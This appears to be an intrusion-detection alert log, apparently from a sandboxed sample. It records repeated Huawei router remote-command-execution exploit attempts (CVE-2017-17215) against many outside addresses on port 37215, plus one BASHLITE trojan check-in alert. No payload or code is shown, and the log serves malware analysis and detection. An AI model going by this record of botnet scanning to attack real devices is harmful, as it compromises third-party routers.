                                            06/14/24-10:44:08.517182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3615037215192.168.2.14156.14.66.158
                                            06/14/24-10:43:50.111305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4482237215192.168.2.1441.125.166.148
                                            06/14/24-10:44:02.367706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3494637215192.168.2.14156.126.146.199
                                            06/14/24-10:44:02.366374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4056437215192.168.2.1441.207.32.54
                                            06/14/24-10:44:31.090969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4955037215192.168.2.1441.86.106.77
                                            06/14/24-10:44:02.383826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4939637215192.168.2.14197.0.9.92
                                            06/14/24-10:43:48.031459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3858637215192.168.2.14197.133.198.241
                                            06/14/24-10:44:22.859053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4170037215192.168.2.14156.142.226.38
                                            06/14/24-10:44:26.985484TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5069237215192.168.2.14197.190.241.221
                                            06/14/24-10:43:50.073908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5079037215192.168.2.1441.222.248.10
                                            06/14/24-10:43:45.968508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4418837215192.168.2.1441.183.177.27
                                            06/14/24-10:43:48.022237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5717037215192.168.2.14197.127.67.79
                                            06/14/24-10:43:36.700678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4654037215192.168.2.1441.122.52.32
                                            06/14/24-10:43:58.273764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3535837215192.168.2.1441.217.143.218
                                            06/14/24-10:44:33.152305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3488237215192.168.2.1441.207.140.196
                                            06/14/24-10:43:54.186403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5013037215192.168.2.1441.232.120.71
                                            06/14/24-10:44:20.831145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4120237215192.168.2.1441.3.89.34
                                            06/14/24-10:43:58.295200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3850237215192.168.2.14156.146.9.2
                                            06/14/24-10:44:26.986083TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4332837215192.168.2.1441.146.39.132
                                            06/14/24-10:44:00.336943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4304037215192.168.2.14156.171.96.208
                                            06/14/24-10:43:39.792001TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4543837215192.168.2.1441.194.187.118
                                            06/14/24-10:43:56.228927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3797637215192.168.2.14197.21.156.233
                                            06/14/24-10:44:16.732238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4838837215192.168.2.14197.165.172.194
                                            06/14/24-10:43:50.111518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5166837215192.168.2.14156.87.212.140
                                            06/14/24-10:44:12.624880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3400037215192.168.2.14197.139.153.20
                                            06/14/24-10:44:31.053994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3490837215192.168.2.14156.25.144.209
                                            06/14/24-10:43:39.812914TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5922637215192.168.2.14156.162.139.157
                                            06/14/24-10:44:29.011414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5932437215192.168.2.1441.8.72.96
                                            06/14/24-10:43:34.675404TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5413837215192.168.2.1441.16.196.29
                                            06/14/24-10:43:48.029274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5240037215192.168.2.1441.84.156.114
                                            06/14/24-10:44:18.761340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3984637215192.168.2.14156.44.152.35
                                            06/14/24-10:44:24.944542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5527637215192.168.2.14197.130.215.200
                                            06/14/24-10:44:22.882895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5871837215192.168.2.14197.77.32.68
                                            06/14/24-10:43:43.944770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5905237215192.168.2.14197.246.41.219
                                            06/14/24-10:44:20.806271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3515237215192.168.2.14156.225.132.132
                                            06/14/24-10:44:04.420333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6031837215192.168.2.14197.185.205.205
                                            06/14/24-10:44:12.640498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4910437215192.168.2.1441.200.5.131
                                            06/14/24-10:43:52.163825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3937237215192.168.2.1441.178.210.251
                                            06/14/24-10:44:02.383037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5066437215192.168.2.14156.245.255.195
                                            06/14/24-10:43:41.849483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5011037215192.168.2.14156.131.104.9
                                            06/14/24-10:44:29.025734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6057637215192.168.2.1441.144.43.26
                                            06/14/24-10:44:12.616533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5879437215192.168.2.1441.167.240.250
                                            06/14/24-10:44:12.617511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4304237215192.168.2.1441.222.128.182
                                            06/14/24-10:43:54.183350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4925637215192.168.2.1441.236.19.76
                                            06/14/24-10:44:29.011291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4016637215192.168.2.14197.215.143.210
                                            06/14/24-10:44:24.913907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3463437215192.168.2.14197.16.148.124
                                            06/14/24-10:44:02.366853TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6034037215192.168.2.1441.186.69.124
                                            06/14/24-10:44:16.737666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5720637215192.168.2.14156.167.203.163
                                            06/14/24-10:43:43.941768TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3678637215192.168.2.14197.81.126.7
                                            06/14/24-10:43:39.789653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5086437215192.168.2.1441.101.52.139
                                            06/14/24-10:43:48.020425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3636637215192.168.2.14197.58.77.143
                                            06/14/24-10:44:12.618815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4940037215192.168.2.14197.90.163.156
                                            06/14/24-10:44:31.052838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4572837215192.168.2.1441.42.251.162
                                            06/14/24-10:43:41.846590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3861837215192.168.2.14197.197.35.65
                                            06/14/24-10:44:12.614272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5139837215192.168.2.1441.101.61.115
                                            06/14/24-10:43:45.967271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5508637215192.168.2.14156.169.83.41
                                            06/14/24-10:43:48.033370TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4477237215192.168.2.14156.147.25.4
                                            06/14/24-10:44:18.762787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3315637215192.168.2.1441.96.131.70
                                            06/14/24-10:44:00.336570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5412037215192.168.2.1441.234.187.154
                                            06/14/24-10:43:36.729890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5971437215192.168.2.14156.165.26.177
                                            06/14/24-10:43:54.182701TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4167837215192.168.2.14156.29.31.213
                                            06/14/24-10:43:56.229104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5856037215192.168.2.14156.18.68.139
                                            06/14/24-10:44:02.383651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5067837215192.168.2.14156.255.158.186
                                            06/14/24-10:44:00.343842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4539437215192.168.2.14197.31.5.170
                                            06/14/24-10:44:10.565161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3394237215192.168.2.14156.120.65.169
                                            06/14/24-10:43:39.809470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5236237215192.168.2.1441.74.86.49
                                            06/14/24-10:44:04.424445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5777637215192.168.2.1441.222.130.170
                                            06/14/24-10:43:54.183225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4958837215192.168.2.14156.27.202.74
                                            06/14/24-10:44:18.776773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3671037215192.168.2.14156.240.163.135
                                            06/14/24-10:44:12.618009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5644237215192.168.2.14197.250.76.105
                                            06/14/24-10:44:24.915713TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5297637215192.168.2.14197.71.214.221
                                            06/14/24-10:44:04.420009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4310037215192.168.2.1441.180.79.54
                                            06/14/24-10:44:10.563826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4071637215192.168.2.14197.15.8.155
                                            06/14/24-10:43:34.676782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3342437215192.168.2.14156.13.235.110
                                            06/14/24-10:43:43.969069TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3284637215192.168.2.1441.44.124.101
                                            06/14/24-10:44:31.094834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4483837215192.168.2.14156.233.189.196
                                            06/14/24-10:44:29.013138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4250037215192.168.2.14197.102.79.30
                                            06/14/24-10:44:24.943140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4440037215192.168.2.14156.43.48.211
                                            06/14/24-10:44:16.718102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3572237215192.168.2.1441.181.228.214
                                            06/14/24-10:43:54.183445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4887837215192.168.2.14197.195.177.199
                                            06/14/24-10:43:54.201922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5072237215192.168.2.14197.160.253.2
                                            06/14/24-10:43:52.163952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3809637215192.168.2.1441.138.227.162
                                            06/14/24-10:44:16.715591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5555437215192.168.2.1441.32.45.69
                                            06/14/24-10:43:50.071396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4965637215192.168.2.1441.134.211.61
                                            06/14/24-10:43:43.941004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3403637215192.168.2.14197.155.111.243
                                            06/14/24-10:44:04.411880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4722237215192.168.2.14156.233.56.2
                                            06/14/24-10:44:12.643594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3569437215192.168.2.14197.175.97.254
                                            06/14/24-10:44:16.716183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5967237215192.168.2.14156.61.213.36
                                            06/14/24-10:44:02.381715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4032237215192.168.2.1441.228.229.205
                                            06/14/24-10:43:50.074058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5843037215192.168.2.14156.135.199.251
                                            06/14/24-10:43:52.165126TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5315837215192.168.2.1441.57.89.89
                                            06/14/24-10:44:08.501551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3544037215192.168.2.1441.212.210.147
                                            06/14/24-10:44:14.688427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3597837215192.168.2.1441.245.17.111
                                            06/14/24-10:44:24.915533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5184237215192.168.2.14156.84.101.115
                                            06/14/24-10:44:33.133616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5530637215192.168.2.1441.186.11.255
                                            06/14/24-10:44:14.672285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5736437215192.168.2.14197.131.4.76
                                            06/14/24-10:44:22.857883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5761037215192.168.2.1441.111.76.248
                                            06/14/24-10:43:39.791772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5449037215192.168.2.1441.192.253.160
                                            06/14/24-10:43:36.701546TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3916437215192.168.2.1441.58.105.42
                                            06/14/24-10:44:35.179171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5511837215192.168.2.1441.38.145.248
                                            06/14/24-10:43:56.229259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5407237215192.168.2.14197.65.203.204
                                            06/14/24-10:44:33.150980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4793637215192.168.2.14197.89.13.133
                                            06/14/24-10:44:22.859607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5037837215192.168.2.14197.152.162.145
                                            06/14/24-10:44:35.180911TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5453237215192.168.2.14156.7.88.115
                                            06/14/24-10:43:58.275657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5167237215192.168.2.14197.201.245.134
                                            06/14/24-10:44:04.411807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3538237215192.168.2.14197.8.110.196
                                            06/14/24-10:44:24.934277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5420837215192.168.2.1441.232.186.110
                                            06/14/24-10:44:12.643825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3907437215192.168.2.14197.233.206.140
                                            06/14/24-10:43:45.989744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3740837215192.168.2.14197.252.202.160
                                            06/14/24-10:44:18.763467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5903437215192.168.2.1441.87.176.0
                                            06/14/24-10:43:36.725671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5112037215192.168.2.14197.104.152.127
                                            06/14/24-10:44:00.339395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3973037215192.168.2.1441.4.237.5
                                            06/14/24-10:43:36.727171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4187037215192.168.2.1441.93.142.79
                                            06/14/24-10:44:29.022346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3299037215192.168.2.14197.247.169.188
                                            06/14/24-10:44:31.057226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5427637215192.168.2.14197.155.217.159
                                            06/14/24-10:43:37.762516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5803437215192.168.2.1441.197.170.95
                                            06/14/24-10:44:12.624449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5188637215192.168.2.1441.68.131.24
                                            06/14/24-10:44:24.913792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5520037215192.168.2.14197.18.59.36
                                            06/14/24-10:44:02.366357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5791437215192.168.2.14197.235.51.116
                                            06/14/24-10:43:43.942605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5874037215192.168.2.14197.99.153.52
                                            06/14/24-10:43:52.177351TCP2840515ETPRO TROJAN ELF/BASHLITE Variant Reporting Arch Type (i586)5843023192.168.2.1443.231.232.101
                                            06/14/24-10:43:52.164500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4290837215192.168.2.14156.104.187.50
                                            06/14/24-10:43:48.021081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4823437215192.168.2.1441.130.87.159
                                            06/14/24-10:43:39.808285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4364837215192.168.2.1441.154.51.247
                                            06/14/24-10:44:08.504787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4353437215192.168.2.14156.119.102.155
                                            06/14/24-10:43:45.968032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3720837215192.168.2.14156.165.58.14
                                            06/14/24-10:43:41.896426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3578437215192.168.2.1441.188.209.121
                                            06/14/24-10:43:43.967097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4830637215192.168.2.14156.6.180.5
                                            06/14/24-10:44:12.616348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4633437215192.168.2.14197.226.114.103
                                            06/14/24-10:44:06.470032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4286037215192.168.2.14197.211.103.136
                                            06/14/24-10:44:06.449542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5958437215192.168.2.1441.168.200.59
                                            06/14/24-10:44:35.181040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5097837215192.168.2.14156.224.200.85
                                            06/14/24-10:43:37.762717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6025437215192.168.2.14197.21.18.100
                                            06/14/24-10:43:48.017115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4133237215192.168.2.1441.145.164.88
                                            06/14/24-10:43:54.182806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3287837215192.168.2.14156.136.41.45
                                            06/14/24-10:43:34.662715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5666037215192.168.2.1441.76.10.213
                                            06/14/24-10:43:37.772454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5946437215192.168.2.14197.227.95.173
                                            06/14/24-10:43:36.724643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5852037215192.168.2.14197.130.253.152
                                            06/14/24-10:43:34.660977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4869837215192.168.2.14156.81.56.92
                                            06/14/24-10:44:00.321939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5137237215192.168.2.14156.26.203.154
                                            06/14/24-10:44:33.150934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4805437215192.168.2.1441.108.78.246
                                            06/14/24-10:43:58.288939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5289637215192.168.2.14197.47.31.61
                                            06/14/24-10:44:26.978540TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4901237215192.168.2.14197.52.26.113
                                            06/14/24-10:44:18.764900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5077237215192.168.2.14156.146.42.16
                                            06/14/24-10:43:39.812473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4505037215192.168.2.14197.178.214.214
                                            06/14/24-10:44:04.405363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5558637215192.168.2.14156.55.102.177
                                            06/14/24-10:44:14.684365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4665837215192.168.2.14156.132.143.2
                                            06/14/24-10:44:04.407666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5294037215192.168.2.1441.71.177.224
                                            06/14/24-10:43:56.225047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5275437215192.168.2.14197.151.25.202
                                            06/14/24-10:43:39.791459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5027437215192.168.2.14156.6.83.192
                                            06/14/24-10:44:26.986019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3900637215192.168.2.14197.123.155.248
                                            06/14/24-10:43:48.015704TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4786837215192.168.2.14156.98.165.111
                                            06/14/24-10:44:06.451600TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3875237215192.168.2.14197.118.5.76
                                            06/14/24-10:44:26.980016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5333437215192.168.2.14156.232.192.161
                                            06/14/24-10:44:31.091536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3677037215192.168.2.1441.86.240.49
                                            06/14/24-10:43:58.290661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4813437215192.168.2.14197.42.206.232
                                            06/14/24-10:43:56.253653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3354837215192.168.2.14197.12.255.27
                                            06/14/24-10:44:26.997157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4946637215192.168.2.14156.97.189.218
                                            06/14/24-10:44:12.618573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5390437215192.168.2.14156.189.206.71
                                            06/14/24-10:44:16.715856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5858437215192.168.2.14197.124.64.96
                                            06/14/24-10:44:02.365714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5981837215192.168.2.14156.183.45.103
                                            06/14/24-10:43:43.942140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5904237215192.168.2.14156.49.160.16
                                            06/14/24-10:43:48.028791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4864637215192.168.2.1441.50.112.219
                                            06/14/24-10:44:08.501381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5592837215192.168.2.14156.132.133.49
                                            06/14/24-10:44:10.564212TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5886637215192.168.2.14197.228.157.197
                                            06/14/24-10:44:00.342833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4283837215192.168.2.1441.81.207.172
                                            06/14/24-10:44:00.322335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4940437215192.168.2.14156.207.77.146
                                            06/14/24-10:43:43.969206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3654237215192.168.2.1441.65.40.67
                                            06/14/24-10:44:22.857554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4208037215192.168.2.1441.37.114.45
                                            06/14/24-10:44:35.176986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3353437215192.168.2.14197.24.57.93
                                            06/14/24-10:44:08.502938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5343037215192.168.2.1441.235.187.105
                                            06/14/24-10:43:37.763186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5629237215192.168.2.1441.200.247.17
                                            06/14/24-10:44:12.643387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3586237215192.168.2.14197.108.139.138
                                            06/14/24-10:44:29.013859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5092037215192.168.2.14197.84.39.183
                                            06/14/24-10:44:00.338041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5416237215192.168.2.1441.191.1.176
                                            06/14/24-10:43:34.663553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4801637215192.168.2.14197.72.101.78
                                            06/14/24-10:43:52.146848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5817637215192.168.2.14197.167.2.64
                                            06/14/24-10:44:04.410871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3943037215192.168.2.14156.223.78.124
                                            06/14/24-10:43:48.027593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5682637215192.168.2.14197.159.48.83
                                            06/14/24-10:43:37.759300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3658637215192.168.2.14156.136.97.38
                                            06/14/24-10:44:14.681725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4922437215192.168.2.14197.127.198.223
                                            06/14/24-10:43:37.772265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4127237215192.168.2.14197.177.30.122
                                            06/14/24-10:43:48.045863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5113837215192.168.2.14197.146.21.113
                                            06/14/24-10:43:36.705425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3901837215192.168.2.14156.234.43.13
                                            06/14/24-10:44:26.985143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4403437215192.168.2.1441.254.245.39
                                            06/14/24-10:43:41.909425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3723037215192.168.2.14156.14.64.4
                                            06/14/24-10:44:04.421426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4750237215192.168.2.1441.126.223.81
                                            06/14/24-10:44:10.545865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5109837215192.168.2.14197.123.91.175
